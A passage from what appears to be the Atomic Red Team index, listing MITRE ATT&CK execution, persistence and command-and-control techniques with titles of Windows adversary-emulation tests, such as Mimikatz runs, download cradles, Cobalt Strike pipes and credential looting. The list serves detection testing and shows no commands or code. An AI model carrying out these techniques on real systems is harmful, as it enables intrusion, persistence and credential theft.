- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- [T1059.001 Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- Atomic Test #22: Abuse Nslookup with DNS Records [windows]
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559 Inter-Process Communication](../../T1559/T1559.md)
- Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
- Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
- Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
- Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
- Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1173 Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
- Atomic Test #6: Snake Malware Service Create [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
- Atomic Test #2: Persistent Code Execution Via Excel Add-in File (XLL) [windows]
- Atomic Test #3: Persistent Code Execution Via Word Add-in File (WLL) [windows]
- Atomic Test #4: Persistent Code Execution Via Excel VBA Add-in File (XLAM) [windows]
- Atomic Test #5: Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) [windows]
- [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1505.005 Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md)
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: PowerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- T1060 Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistence via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- Atomic Test #10: Domain Password Policy Check: Short Password [windows]
- Atomic Test #11: Domain Password Policy Check: No Number in Password [windows]
- Atomic Test #12: Domain Password Policy Check: No Special Character in Password [windows]
- Atomic Test #13: Domain Password Policy Check: No Uppercase Character in Password [windows]
- Atomic Test #14: Domain Password Policy Check: No Lowercase Character in Password [windows]
- Atomic Test #15: Domain Password Policy Check: Only Two Character Classes [windows]
- Atomic Test #16: Domain Password Policy Check: Common Password Use [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1505.004 IIS Components](../../T1505.004/T1505.004.md)
- Atomic Test #1: Install IIS Module using AppCmd.exe [windows]
- Atomic Test #2: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule [windows]
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1137.002 Office Application Startup: Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence (HKCU) [windows]
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #2: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- Atomic Test #8: NetSupport - RAT Execution [windows]
- Atomic Test #9: UltraViewer - RAT Execution [windows]
- Atomic Test #10: UltraVNC Execution [windows]
- Atomic Test #11: MSP360 Connect Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
